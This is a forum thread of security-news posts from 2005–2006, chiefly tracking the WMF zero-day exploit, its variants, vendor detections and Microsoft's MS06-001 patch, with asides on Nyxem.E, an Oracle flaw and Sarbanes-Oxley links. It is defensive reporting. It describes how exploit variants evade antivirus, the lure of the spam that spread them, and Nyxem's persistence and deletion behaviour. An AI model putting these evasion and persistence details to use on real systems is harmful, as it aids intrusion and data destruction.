Please be careful with sites that you visit and particularly playing WMF (Windows Media File) using Internet Explorer or other browsers. I believe Microsoft will prioritize and patch this new vulnerability expediently, so please look for upcoming security advisories, workarounds, and ultimately a patch. In the mean time, follow best practices in only visiting safe sites and keep your AV protection updated as anti-virus vendors will also prioritize security protection for this new in-the-wild exploit. Finally, the workaround offered by FrSIRT appears promising, as noted at the bottom.
STATUS INFORMATION
INTERNET STORM CENTER – YELLOW ALERT
F-SECURE BLOG – GOOD STATUS INFORMATION
SUNBELT BLOG – GOOD STATUS INFORMATION
SECUNIA INFORMATION
Microsoft Windows WMF Handling Arbitrary Code Execution
http://secunia.com/advisories/18255/Secunia Advisory: SA18255
Release Date: 2005-12-28Rating: Extremely critical
Impact: System access
Where: From remote
Solution Status: UnpatchedQUOTE: A vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to an error in the handling of corrupted Windows Metafile files (“.wmf”). This can be exploited to execute arbitrary code by tricking a user into opening a malicious “.wmf” file in “Windows Picture and Fax Viewer” or previewing a malicious “.wmf” file in explorer (i.e. selecting the file). This can also be exploited automatically when a user visits a malicious web site using Microsoft Internet Explorer.
Solution: Do not open or preview untrusted “.wmf” files and set security level to “High” in Microsoft Internet Explorer.
TREND MICRO INFORMATION
TWO TROJAN HORSE VARIANTS SO FAR
QUOTE: The Windows Picture and Fax Viewer vulnerability is a zero-day exploit that is capable of remote code execution. Zero-day exploits are termed as such because the unpatched vulnerability and its corresponding exploit code are released within the same day. This may pose as a dangerous situation in which a lot of systems may be affected due to the availability of exploit code, and the fact that the vendor has not been given enough time to patch it.
FRSIRT INFORMATION
Microsoft Windows WMF Handling Remote Code Execution Vulnerability
http://www.frsirt.com/english/advisories/2005/3086FrSIRT Advisory: FrSIRT/ADV-2005-3086
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-12-28Recommended Workaround by FrSIRT: Disable “Windows Picture and Fax Viewer” : on the Start menu, choose Run, and then type “regsvr32.exe /u shimgvw.dll”.
-
December 29, 2005 at 1:37 am #3083642
Microsoft Security Advisory 912840 issued for WMF vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Microsoft has issued a security advisory to share initial information on this new unpatched vulnerability which is being exploited in-the-wild. As Microsoft advises keep your AV and anti-spyware software updated to the latest definitions.
Microsoft Security Advisory (912840)
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/912840.mspx -
December 29, 2005 at 5:35 am #3083597
Current recommendations for Malicious WMF Exploits in-the-wild
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Microsoft has issued Security Advisory 912840 for a Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution. As noted in the bulletin they have the highest priority in testing out and providing solutions for the WMF exploits that are currently circulating. So far, most WMF attacks come from visiting unsafe websites, so follow best practices and “think before you click” in web surfing and never click on links in email or Instant Messenging.
Current recommendations for Malicious WMF Exploits in-the-wild
1. Keep your Anti-Virus and Anti-Spyware software as up-to-date as possible. For McAfee users should install DAT 4661 or higher now
2. Stay away from any questionable sites and do not open WMF files or links in any environment (e.g., IM, email, web surfing, explorer, etc.).
3. Filter and block WMF files in email or content filtering systems
4. Don’t rely just on the WMF extension as Windows metadata processing can process a disguised and renamed extension. For example, the extension of a WMF file might renamed to GIF and when Windows tries to open it, it may recognize that it’s a WMF file originally and try to open it that way.
5. As an extra safety precaution, you can turn off the vulnerable DLL. The Full Disclosure workaround has downloadable *.REG file that allows toggling shimgvw.dll on and off. Another option might be to turn off the shimgvw.dll service completely, which will result in a minor loss of functionality. Turning off this DLL will impact thumbnail previews in Windows Explorer and Windows Fax & Picture viewer, as both will no longer work. Still you can restore this service later after better protective solutions emerge.Please click on this link for more information:
Malicious Zero Day Windows Media File Exploits are in-the-wild
-
December 31, 2005 at 5:36 pm #3081901
Browser Security Testing Site: scanit.be
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
A security firm from Belgium offers a testing facility for browsers. I tested IE 6 (XP SP2 version), Firefox 1.5, and Opera 8.51 and all three passed the test as follows:
The Browser Security Test is finished. Please find the results below:
High Risk Vulnerabilities 0
Medium Risk Vulnerabilities 0
Low Risk Vulnerabilities 0QUOTE: Can someone hack into your computer via your browser? How vulnerable you are? Can websites install spyware through your browser? Scanit’s Browser Security Test automatically checks your browser for various security problems. When the test is finished you get a complete report explaining the discovered vulnerabilities, their impact and how to eliminate them.
-
December 31, 2005 at 5:36 pm #3081899
New WMF Exploit version emerges – ISC returns to Yellow alert
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
There is a “new and improved” edition of the WMF exploit that does not use a WMF extension. It also varies in size randomly to better evade AV detection. A code Yellow alert has been issued by the Internet Storm Center. There is little or no AV protection available, so extra caution should be used.
New exploit released for the WMF vulnerability – YELLOW
http://isc.sans.org/diary.php?storyid=992A copy of the actual exploit can be found at FrSIRT for anyone wanting to review the code, but please use caution. The exploit generates files with the following characteristics:
* with a random size;
* no .wmf extension, (.jpg), but could be any other image extension actually;
* a random piece of junk in front of the bad call; carefully crafted to be larger than the MTU on an ethernet network;
* a number of possible calls to run the exploit are listed in the source;
* a random trailer -
December 31, 2005 at 5:36 pm #3081900
New IM Worm – used to spread malicious WMF exploit
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Kapsersky has received information on a new IM Worm is hitting the Netherlands. Apparently the worm is spreading with MSN and is spreading with a malformed WMF file called xmas-2006 FUNNY.jpg
Please be careful when opening the New Years Greeting links or other seaonal greetings.
-
December 31, 2005 at 9:36 pm #3081874
New WMF variant – McAfee protection to be released in DAT 4664
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
McAfee has just updated their website with information related to the new WMF variant. There is some generic protection for the new variant currently. An extra DAT file can also be applied now to provide production using this special approach for a single new virus. The next DAT file release of 4664 will address this new risk fully for all users. This appears to be scheduled for Monday, unless this new variant requires an earlier emergency release.
http://vil.nai.com/vil/content/v_137760.htm
— December 31, 2005 —
QUOTE: Source code for a tool that creates Exploit-WMF files has been posted to the web. This source creates malicous WMF files that exploit the vulnerability in a slightly different way than previous ones. While generic detection has existed since the discovery of Exploit-WMF, this new code requires the first adjustment to that detection in order to cover some exploits that may be created by this source code. The updated detection will be released in the 4664 DAT files and is currently available via an EXTRA.DAT file: An extra.dat file for Exploit-WMF may be downloaded via the Extra Dat Request Page.
-
January 1, 2006 at 5:39 am #3081846
New WMF variant – McAfee protection was released in DAT 4664
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
McAfee has just updated their website with information related to the new WMF variant. There is some generic protection for the new variant currently. An extra DAT file can also be applied now to provide production using this special approach for a single new virus. AVERT made an emergency release of DAT file 4664 on New Year’s eve that addresses this new risk. Corporate and home users should apply this new level of protection as soon as possible.
http://vil.nai.com/vil/content/v_137760.htm
QUOTE: — December 31, 2005 —
Source code for a tool that creates Exploit-WMF files has been posted to the web. This source creates malicious WMF files that exploit the vulnerability in a slightly different way than previous ones. While generic detection has existed since the discovery of Exploit-WMF, this new code requires the first adjustment to that detection in order to cover some exploits that may be created by this source code. The updated detection has been released in the 4664 DAT files.— Update 1 —
An email message containing an Exploit-WMF sample built from this new code has been spammed. The message appears as follows:Subject: Happy New Year
Body: picture of 2006
Attachment: HappyNewYear.jpg (actually a WMF file with a .JPG extension)The attachment causes a new BackDoor-CEP variant to be downloaded and run from a hostile web site.
— Update 2 —
Due to the serious nature of the WMF vulnerability and recent discovery of new exploit code, the 4664 DAT files were released out of cycle to detect these new Exploit-WMF samples. -
January 1, 2006 at 5:39 am #3081845
New WMF exploit version spammed as Happy New Year greetings
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Please note that the 2nd generation of the WMF exploit has been spammed out via email. It appears as a Happy New Year’s greeting . This is briefly noted in McAfee’s release for DAT 4464 which covers this new variant.
McAfee – DAT 4464 released early for new WMF version
http://vil.nai.com/vil/content/v_137760.htmAn email message containing an Exploit-WMF built from this new code has been spammed. The message appears as follows:
Subject: Happy New Year
Body: picture of 2006
Attachment: HappyNewYear.jpg (actually a WMF file with a .JPG extension) -
January 1, 2006 at 5:39 am #3081844
Internet Storm Center offers FAQ on new WMF Exploits
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
The Internet Storm Center has posted excellent information in the form of Frequently Asked Questions for new WMF Exploits:
-
January 2, 2006 at 3:33 am #3081087
2nd Generation WMF exploit – Only a few AV vendors can detect it
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
In testing at the Virus Total site, where over a dozen AV vendors participate, only 3 AV vendors detected the new variable length WMF exploit version. Most likely more AV vendors will add protection today.
2nd Generation WMF exploit – Only a few AV vendors can detect it
http://isc.sans.org/diary.php?storyid=998eTrust-Vet 12.4.1.0 01.01.2006 Win32/Worfo
McAfee 4664 01.01.2006 Exploit-WMF
Symantec 8.0 01.01.2006 Backdoor.Trojan ****** Note that the Symantec detect is most likely on the payload.
-
January 2, 2006 at 7:33 am #3081063
The WMF Exploit – Ideas for system administrators returning to work
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
In the various forums I participate in, I saw that many administrators worked during the holiday period, which is one reason we celebrate Systems Administrator appreciation day on July 28. This new zero day exploit is very serious and depending on the malware attack it can damange PCs so that they need to be rebuilt from the ground-up. Not only are there limited defenses on the Windows Meta File (WMF) exploit but it impacts almost every version of Windows.
Below are some key steps security and system administrators should take in fortifying their environments:
1. Move to the latest virus definitions and stay up-to-date daily. McAfee users should move to DAT 4664 right away for improved protection for both forms of the WMF exploit.
2. Block all WMF attachments in email and filter other channels like IM or web surfing as applicable. Still, don’t rely on the WMF extension alone, as any extension type can be used with the second and more dangerous version of this exploit. An email version of the WMF exploit has been spammed out as a New Years Day greeting message with a JPEG attachment (that’s a WMF file in disguise due to metadata processing). Emails with an attachment of HappyNewYear.jpg should be blocked.
3. An all employees bulletin might be beneficial in promoting awareness to avoid opening any suspicious files or links they might find in their in-box. Everyone needs to be cautious when opening email and IM files or URL links. This can also help folks protect their home PCs as well.
4. There’s an ISC’s “unofficial” hotfix patch that can temporarily offer protection until Microsoft has completed their work. Several security sites have affirmed this as trustworthy and it can be uninstalled from the Add/Remove programs section of the control panel once the anticipated patch from Microsoft is available. This new hotfix should be lab tested rigorously within the company including all current software, web applications, and the capability to uninstall the fix completely. The Internet Storm Center has more information on this hotfix patch.
5. All security and network administrators should have the WMF exploit high on their watchlist. This includes actively monitoring security sites like The Internet Storm Center, Secunia, F-Secure, AVERT, etc. for breaking news.
-
January 2, 2006 at 11:33 am #3081026
Several new WMF-Exploit variants reported by Trend
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Active development of new attacks continues based on several new variants using the WMF-Exploit, as reported by Trend.
Several new WMF-Exploit variants reported by Trend
http://www.trendmicro.com/vinfo/MALWARE-NAME LEVEL-RISK DATE-POSTED PROTECTION
TROJ_NASCENE.M Low Jan 2, 2006 Available soon
TROJ_NASCENE.J Low Jan 1, 2006 3.139.00
TROJ_NASCENE.K Low Jan 1, 2006 3.139.00
TROJ_NASCENE.L Low Jan 1, 2006 3.139.00
TROJ_NASCENE.I Low Jan 1, 2006 3.139.00
TROJ_NASCENE.H Low Dec 31, 2005 2.138.11 (CPR) -
January 5, 2006 at 9:34 am #3094849
Microsoft updates key security guides for corporate users
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Microsoft has recently updated key security guides targeted for enterprise users:
The Threats and Countermeasures Guide v2.0
The Windows Server 2003 Security Guide v2.0
-
January 5, 2006 at 1:41 pm #3094710
MS06-001: Microsoft releases WMF patch early
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
All users should perform a Windows Update as soon as they can. Microsoft decided to release MS06-001 earlier than planned. It just became available under Windows Update … It requires a reboot and is working well for me so far.
MS06-001: Microsoft releases WMF patch early
MS06-001: Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (912919)
-
January 9, 2006 at 3:56 am #3096621
Sony BMG Rootkit – Preliminary Settlement Terms announced
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
The Sunbelt blogs provide excellent updates on security news. Recently, this summary of the preliminary settlement terms were announced for damages caused by the First 4 Internet and SunnComm protective software. System damage and other issues were created by customers playing CDs in their PCs and these agents being secretly loaded from musical CD automatically.
-
January 9, 2006 at 3:56 am #3096622
Lotus Notes – Vulnerable to WMF exploit fixed by MS06-001
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
The MS06-001 security update provided by Microsoft last week has hopefully installed by most companies and users. There are over 100 WMF exploits developed so far in-the-wild and non-Microsoft products may be affected as noted in this link.
-
January 9, 2006 at 10:52 am #3080431
WMF Exploit – How well do AV products detect this new threat?
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Thankfully, Microsoft provided MS06-001 protection as an early emergency release to protect against a very active environment of exploitation. Prior to this release, Anti-Virus protection was one of the key defense approaches to help block these malicious attacks. While most likely all AV vendors have improved their capability to handle WMF exploits, the following provides some key testing conducted by AV-Test during some of the critical days prior to Microsoft’s security release.
-
January 9, 2006 at 2:53 pm #3078274
WMF exploits – Two new areas of vulnerability?
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
There may be two new possible areas of attack for malformed WMF files, which may not be covered by MS06-001? So far, no exploits in the wild have been reported and this new potential exposure should be carefully watched.
Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities
http://www.incidents.org/diary.php?storyid=1031
http://www.securityfocus.com/bid/16167/infoQUOTE: Microsoft Windows WMF graphics rendering engine is affected by multiple memory corruption vulnerabilities. These issues affect the ‘ExtCreateRegion’ and ‘ExtEscape’ functions. These problems present themselves when a user views a malicious WMF formatted file containing specially crafted data. Reports indicate that these issues lead to a denial of service condition, however, it is conjectured that arbitrary code execution is possible as well. Any code execution that occurs will be with the privileges of the user viewing a malicious image. An attacker may gain SYSTEM privileges if an administrator views the malicious file.
-
January 10, 2006 at 4:14 pm #3078791
Microsoft Security Bulletins – January 2006
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
While hopefully everyone has installed MS06-001, Microsoft has just released two more critical security patches, as part of their normal “Patch Tuesday” updates. I’ve updated both of my work PCs and in early testing, no issues so far
Microsoft Security Bulletins – January 2006
http://www.microsoft.com/technet/security/bulletin/ms06-jan.mspx
Microsoft Security Bulletin MS06-001
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (912919)
http://www.microsoft.com/technet/security/bulletin/ms06-001.mspxMaximum Severity Rating: Critical
Impact of Vulnerability: Remote Code ExecutionOverview: This vulnerability is currently being exploited and was previously discussed by Microsoft in Microsoft Security Advisory 912840. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Microsoft Security Bulletin MS06-002
Vulnerability in Embedded Web Fonts Could Allow Remote Code Execution (908519)
http://www.microsoft.com/technet/security/bulletin/ms06-002.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code ExecutionOverview: An attacker who successfully exploited this vulnerability could take control of an affected system. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Microsoft Security Bulletin MS06-003
Vulnerability in TNEF Decoding in Microsoft Outlook and Microsoft Exchange Could Allow Remote Code Execution (902412)
http://www.microsoft.com/technet/security/bulletin/ms06-003.mspx
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: CriticalOverview: This update resolves a newly-discovered, privately-reported vulnerability that could allow an attacker to run arbitrary code on the system. The vulnerability is documented in the “Vulnerability Details” section of this bulletin. On vulnerable versions of Outlook, Office Language Interface Packs, Office MultiLanguage Packs or Office Multilingual User Interface Packs, if a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of the client workstation.
-
January 11, 2006 at 5:32 am #3079642
Linux users may be impacted by WMF in Windows emulation mode
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
In sharing with some users in one of the forums, the question was asked regarding whether Wine or CrossOver Office are impacted (i.e., as they provide an emulation environment to run Windows applications in Linux). In researching this there may indeed be impacts and it’s important to apply any associated updates:
Wine Potential WMF “SETABORTPROC” Vulnerability
http://secunia.com/advisories/18323/
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=346197 -
January 11, 2006 at 5:32 am #3079643
Apple Quick Time media player – Critical Update for Mac and Windows
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
All Windows and Mac users who have Quick Time installed should update to the latest versions of this software:
Apple Quick Time Advisory Information
http://www.incidents.org/diary.php?storyid=1033
http://secunia.com/advisories/18370/
http://www.frsirt.com/english/advisories/2006/0128Apple Quick Time Advisory Downloads
Mac OS X (version 10.3.9 or later):
http://www.apple.com/support/downloads/quicktime704.htmlWindows 2000/XP:
http://www.apple.com/quicktime/download/win.htmlDESCRIPTION: Some vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a user’s system
-
January 11, 2006 at 5:32 pm #3078546
Feebs – New email/downloader virus
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
This one may be spreading and uses 5 malicious websites that were reported to be still working.
Feebs – New email/downloader virus
http://www.incidents.org/diary.php?storyid=1035
http://secunia.com/virus_information/26130/feebdl-a/
http://www.sophos.com/virusinfo/analyses/trojfeebdla.htmlDESCRIPTION: Please avoid all attachments labeled as message.zip. This new zipped HTA-based virus is undetectable by many AV vendors currently.
-
January 12, 2006 at 1:32 pm #3080110
Sarbanes-Oxley Act – Key Information
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
The following links pertain to the Sarbanes-Oxley Act of 2002 based on research. I updated an older posting with more current links, as I’ll need this for a key project at work next week. These links provide information on SOX regulations and it’s impact on IT and security reporting concerns.
The Sarbanes-Oxley Act was signed into law on 30th July 2002, and introduced highly significant legislative changes to financial practice and corporate governance regulation. It introduced stringent new rules with the stated objective: “to protect investors by improving the accuracy and reliability of corporate disclosures made pursuant to the securities laws“.
Sarbanes-Oxley Act – General Information
Sarbanes-Oxley – Key Links
http://www.sarbanes-oxley.com/
http://www.pcaob.com/standards.php
http://www.soxtoolkit.com/
http://www.entrust.com/governance/sox.htm
http://www.auditnet.org/sarbox.htm
http://www.sarbanes-oxley-101.com/Sarbanes-Oxley – Free Forums
http://www.sarbanes-oxley-forum.com/Sarbanes-Oxley – Full Text of Law
http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=107_cong_bills&docid=f:h3763enr.txt.pdfSarbanes-Oxley – AICPA links & Summary
http://www.aicpa.org/sarbanes/index.asp
http://www.aicpa.org/info/sarbanes_oxley_summary.htm
http://www.sarbanes-oxley-101.com/sarbanes-oxley-TOC.htmSarbanes-Oxley – Key Compliance Sections
http://www.sarbanes-oxley-101.com/sarbanes-oxley-compliance.htm
http://www.sarbanes-oxley-101.com/sarbanes-oxley-faq.htm
http://www.sarbanes-oxley-101.com/SOX-302.htm
http://www.sarbanes-oxley-101.com/SOX-404.htm
http://www.sarbanes-oxley-101.com/SOX-409.htm
http://www.sarbanes-oxley-101.com/SOX-902.htmInformation Technology – Critical Success Factors
Using IT successfully to comply with Section 404 means intergrating IT into your Sarbanes-Oxley program by:
1. Making IT an active participant in the company’s program management office for Sarbanes-Oxley compliance;
2. Organizing IT resources and establishing an IT internal control program;
3. Providing IT representation on the steering committee;
4. Identifying, documenting and evaluating IT-related COSO requirements, IT processes and application controls
5. Application Controls: data validation, e-checks and output reconciliations, segregation of duties, protection of sensitive data;
6. General Application Controls: application development, testing, change control, database management, and application level security;
7. General Computer Controls: hardware/software configuration and management, performance and capacity management, security, data center operations, database administration;
8. Employing Best Practices: tools, approaches and internal control specialists as required.
SOX Information Technology – Key Links
http://www.cioinsight.com/article2/0,3959,1217378,00.asp
http://www2.cio.com/analyst/report2271.html
http://www.eweek.com/article2/0,4149,1527933,00.asp
http://www.nwfusion.com/news/2004/0730pwc.html -
January 15, 2006 at 5:32 am #3077418
Use of Rootkits in Symantec AV products is exaggerated
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Recently, a number of media articles have surfaced that claim Symantec is using “Rootkit” techniques by hiding key control folders from the Operating System. This approach might create install/uninstall issues when non-conventional approaches are used. In a worse case, it could be manipulated by virus writers to hide malicious malware.
Symantec is trying to lock down and protect the SAV infrastructure, so that there might be less risk associated with users accidently discovering and manipulating the installed AV environment.
While Symantec uses only one element of a “rootkit” like techique of hiding a control file from the Operating System. The key reason this is NOT a rootkit, is that Symantec is not directly doing anything malicious with this approach.
Symantec is taking steps to further protect this control system, so that the dark side of the force does not use it as a place to hide malware. The original findings were good and hopefully the media will more realistically report techincal findings in the future.
eWeek: Symantec Caught in Norton ‘Rootkit’ Flap
http://www.eweek.com/article2/0,1895,1910077,00.aspQUOTE: Symantec Corp. has admitted to using a rootkit-type feature in Norton SystemWorks that could provide the perfect hiding place for attackers to place malicious files on computers. The anti-virus vendor acknowledged that it was hiding a directory from Windows APIs as a feature to stop customers from accidentally deleting files but, prompted by warnings from security experts, the company shipped a SystemWorks update to eliminate the risk.
Kapersky: No rootkit in Kaspersky Anti-Virus
http://www.viruslist.com/en/weblog?calendar=2006-01QUOTE: We believe that this technology is not a rootkit and we do not believe hackers and/or malware can exploit it because:
1. If a KAV product is active, the streams are hidden and no processes (including system) have access to them.
2. If the product is disabled, the streams will be visible if viewed using the appropriate tools (standard for working with NTFS streams)
3. If a stream is re-written with some (possibly malicious) data or code (for example after rebooting in Safe Mode), when the system is next re-started, KAV will read the stream and not recognize the format. KAV will then begin to rebuild the checksum database – thus it will destroy the alien code/data.
To sum up: I think that the ”rootkit” problem is being over hyped. It is up to all of us in the security industry and press to be careful about how we use terms. Ordinary users, who can’t analyze the situation themselves, shouldn’t be misinformed.
Other Links
-
January 18, 2006 at 5:01 pm #3098221
WMF Exploits – Third New Version emerges this week
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
As noted in the following advisory, a third “new and improved” version of the WMF exploit was published on January 15, 2006. Thankfully, Microsoft has provided MS06-001 protection in the emergency release during early January.
The new link for Exploit “C” can be found in the general FrSIRT advisory. The exploit link could be potentially harmful, if you import this code into your browser environment, so please be careful.
-
January 22, 2006 at 5:02 am #3259725
Firewall Protection: Ports with Known Vulnerabilities and Exploits
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
CERT provides a maintained list of TCP/IP ports that have Known Vulnerabilities and Exploits associated with them. A Firewall system will block these malicious attacks and make an individual’s presence more stealth-like on the Internet.
All home users should employ this safeguard and there are even some of the free versions provide excellent protection. For example, I’ve been using free version of Zone Alarm for several years. Also, XP SP2’s Firewall provides basic incoming protection and integrates very well with Windows.
-
January 22, 2006 at 5:02 am #3259724
The official MSN Messenger 8 beta release and Virkel.F
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
This entry below in December caused some recent confusion, with the official MSNM 8 beta, which has been released by Microsoft:
Virkel.F: Spoofed as an MSN Messenger beta 8 download
During December, virus writers used a social engineering trick to trick users into loading a virus onto their PCs. The Virkel.F offered a new “leaked” MSNM version 8 which did not exist at the time. Users who clicked on the URL link in the message would download a virus rather than the MSNM 8 beta. Most likely this hostile website has been shutdown and copies of the Virkel.F worm do not exist in the wild.
Microsoft has now released MSNM beta 8. It is now safe to download and test MSNM 8, as long as you obtain this directly from Microsoft. As with any software update, users should confirm that their invitations are directly from Microsoft. Please be careful and ensure you are downloading from Microsoft’s site, rather than the spoofed URL used by this virus. “Think before you click.” Always be careful with URLs in email messages, as they can be just as dangerous as email attachments.
-
January 24, 2006 at 7:38 am #3259326
Nyxem.E – email/network virus with destructive payload on 3rd day of month
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
There are now over 600,000 users who have been infected with this new virus. It contains a DESTRUCTIVE payload that will be executed on the 3rd day of the month.
Some of the email messages and attachments use inappropriate languge, and this new destructive threat can be avoided. As a best practice, email and websites of this nature should always be avoided. Still, it is a “network walker” and can spread to PCs that openly share folders or hard drives, so that one copy of this in an organization could be dangerous.
Nyxem.E – Information Storm Center – Latest Information
Nyxem.E – Information Storm Center – Contains several AV Vendor links
Nyxem.E – Fortinet provides an EXCELLENT analysis
File Deletion Dangers — On the 3rd of the month it will attempt to delete a lot of documents off the user’s disks, including Office documents (*.doc, *.xls, *.ppt, *.pps), PDF files, .zip and .rar archives among others.
HTT File Modification — The virus will modify the Desktop.htt configuration file which controls how Active Desktop is displayed to user systems. The change is to launch a copy of the virus as C:\WinZip_Tmp.exe whenever Windows loads the Active Desktop (Windows start up). The virus appends JavaScript code to Desktop.htt
Active X Dangers — The code uses an ActiveX control to reference the file “WinZip_Tmp.exe”. Additionally, the virus will modify the “desktop.ini” configuration file to point to an infectious “Temp.htt” HTML file to launch the virus. The virus is coded to register the dropped ActiveX control through changes to the system registry. By creating the following registry entries, the control is considered “safe” and digitally signed.” The threat of worms like this will make them much more dangerous in the future. If a worm puts a fake CA certificate on an infected machine, MITM attacks become extremely easy
-
January 24, 2006 at 3:38 pm #3257948
Computer Virus – 20th Anniversary this month
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
During January 1986, the first computer virus was found in the wild, which could automatically spread from PC to PC. Today, we encounter 20-30 new variants per day with innovation in their social engineering approach and their overall sophistication. Users always need to employ the best technical defenses, stay up-to-date on all security patches, and “think before they click” any URL or email attachment.
PC viruses hit 20 year milestone
http://news.bbc.co.uk/2/hi/technology/4630910.stmIt was during the opening weeks of 1986 that the first PC virus, called Brain, was discovered in the wild. Though it achieved fame because it was the first of its type, the virus was not widespread as it could only travel by hitching a ride on floppy disks swapped between users. Brain was known as a “boot-sector” virus because of the area on a floppy disk it hid on. By concealing itself in this region, the virus could ensure that it would be installed every time that floppy disk was used on another computer.
-
January 25, 2006 at 7:43 pm #3107328
Bagle – New Round of Variant(s)
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Recently, Bagle celebrated it’s 2nd anniversary and over 400 different variants have emerged. Another round of new variants appear to be seeded in the wild, and we’ll most likely see the email and downloader versions.
-
January 25, 2006 at 7:43 pm #3107327
Kaspersky is now reporting over 1,000,000 PCs are infected
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Kaspersky is now reporting over 1,000,000 PCs are infected
quote: We’ve just issued an alert for Nyxem.e, due to the number of reports we’ve been receiving for the past few days but also because of its destructive payload which activates on 3rd of every month. According to our data, the outbreak seems to be more or less localized. We are still receiving reports from countries such as the US and Germany, but the number of reports from (eg.) Russia is becoming very small.With the public Nyxem.e counter having well passed 1,000,000 hits at the moment, there is no doubt that some people will have unpleasant surprises on 3rd of February. If you do not have an antivirus installed, you can use the Kaspersky free online scanner to check for a Nyxem.e infection before it’s too late.
-
January 26, 2006 at 4:06 pm #3094063
Oracle PL/SQL Gateway – Critical unpatched vulnerability
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
A critical vulnerability has been discovered that is currently unpatched. Oracle will most likely address this quickly and so far there are no reports of this being exploited in the wild.
Oracle Products PL/SQL Gateway Security Bypass Vulnerability
http://secunia.com/advisories/18621/Critical: Highly critical
Impact: Security Bypass
Solution Status: UnpatchedSoftware:
Oracle Application Server 10g
Oracle Database 8.x
Oracle HTTP Server 8.x
Oracle HTTP Server 9.x
Oracle9i Application Server
Oracle9i Database Enterprise Edition
Oracle9i Database Standard EditionDESCRIPTION: A vulnerability has been identified in various Oracle products, which could be exploited by remote attackers to bypass security restrictions and gain unauthorized access to a vulnerable system. This flaw is due to an input validation error in the PL/SQL Gateway component that does not properly handle malformed HTTP requests, which could be exploited by remote unauthenticated attackers to bypass the “PLSQLExclusion” list and gain access to “excluded” packages and procedures that will allow the compromise of the back-end database server.
Oracle PL/SQL Gateway Exclusion List Security Bypass Vulnerability
http://www.frsirt.com/english/advisories/2006/0338Advisory ID : FrSIRT/ADV-2006-0338
CVE ID : GENERIC-MAP-NOMATCH
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-01-25Solution: The FrSIRT is not aware of any official supplied patch for this issue.
Workaround: Administrators can filter malicious characters and character sequences in a proxy or firewall with URL filtering capabilities.
-
January 29, 2006 at 11:43 am #3109388
Oracle DB Server 9/10 – Proof-of-concept Exploit published
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
A new proof-of-concept exploit has been published which could be turned into a more harmful attack by malicious individuals.
Advisory ID : FrSIRT/ADV-2006-0243
CVE ID : CVE-2006-0272
Rated as : High RiskThe exploit code can be viewed at FrSIRT’s site as noted below Please only view the source code if interested and do not test with it:
http://www.frsirt.com/english/
2006-01-26 : Oracle Database Server 9i/10g XML Database Component Buffer Overflow Exploit
-
January 29, 2006 at 11:43 am #3109387
What is difference betwen trojan horse, virus, or worm?
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
-
January 30, 2006 at 3:43 am #3108449
